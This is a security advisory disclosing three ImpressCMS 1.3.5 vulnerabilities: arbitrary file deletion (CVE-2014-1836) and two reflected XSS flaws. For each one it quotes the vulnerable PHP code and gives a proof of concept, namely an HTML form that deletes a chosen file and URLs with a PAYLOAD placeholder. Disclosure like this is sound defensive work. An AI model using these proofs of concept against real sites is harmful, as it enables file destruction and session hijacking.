ImpressCMS 1.3.5 vulnerabilities
===================================
Discovered by 
	Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security
        
Disclosure: 31/01/2014 / Last updated: 12/10/2014
========================================

Vulnerability: Deletion of arbitrary files in the system (CVE-2014-1836)
File(line): /impresscms/htdocs/libraries/image-editor/image-edit.php(62)
Code snippet: 
if (! is_null ( $op ) && $op == 'cancel') {
	$image_path = isset ( $_GET ['image_path'] ) ? $_GET ['image_path'] : null;

	if (file_exists ( $image_path )) {
		@unlink ( $image_path );
	}

Proof of concept:
<form name="input" action="http://192.168.56.101/impresscms/htdocs/libraries/image-editor/image-edit.php?op=cancel&image_path=/path/to/any/file" method="post">
<input type="submit" value="Submit">
</form> 


========================================
Vulnerability: Cross site scripting (XSS) (no CVE)
File(line): /impresscms/htdocs/misc.php(110)
Code snippet:
			<h4><?php echo _MSC_AVAVATARS;?></h4>
			<form name='avatars' action='<?php echo $_SERVER['REQUEST_URI'];?>'>
			<table width='100%'>

Proof of concept:
https://192.168.56.101/impresscms/htdocs/misc.php?action=showpopups&type=avatars&target='>PAYLOAD

NOTE: wasn't able to exploit with Protector on, but someone smarter might be able to do it.


========================================
Vulnerability: Cross site scripting (XSS) (no CVE)
File(line): /impresscms/modules/system/admin/tplsets/main.php(171)
Code snippet:
	case 'listtpl':
		$tplset = trim($_GET['tplset']);
		if ($tplset == '') {
			redirect_header('admin.php?fct=tplsets', 1);
		}
		if ($moddir == '') {
			redirect_header('admin.php?fct=tplsets', 1);
		}
		icms_cp_header();
		$module_handler = icms::handler('icms_module');
		$module =& $module_handler->getByDirname($moddir);
		$modname = $module->getVar('name');
		echo '<div class="CPbigTitle" style="background-image: url('
			. ICMS_MODULES_URL . '/system/admin/tplsets/images/tplsets_big.png)">'
			. '<a href="admin.php?fct=tplsets">'. _MD_TPLMAIN
			.'</a>&nbsp;<span style="font-weight:bold;">&raquo;&raquo;</span>&nbsp;'
			. $tplset . '&nbsp;<span style="font-weight:bold;">&raquo;&raquo;</span>&nbsp;'
			. $modname . '<br /><br /></div><br />';

Proof of concept:
https://192.168.56.101/impresscms/htdocs/modules/system/admin.php?fct=tplsets&op=listtpl&tplset=aaaa">PAYLOAD&moddir=banners

NOTE: wasn't able to exploit with Protector on, but someone smarter might be able to do it.


================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
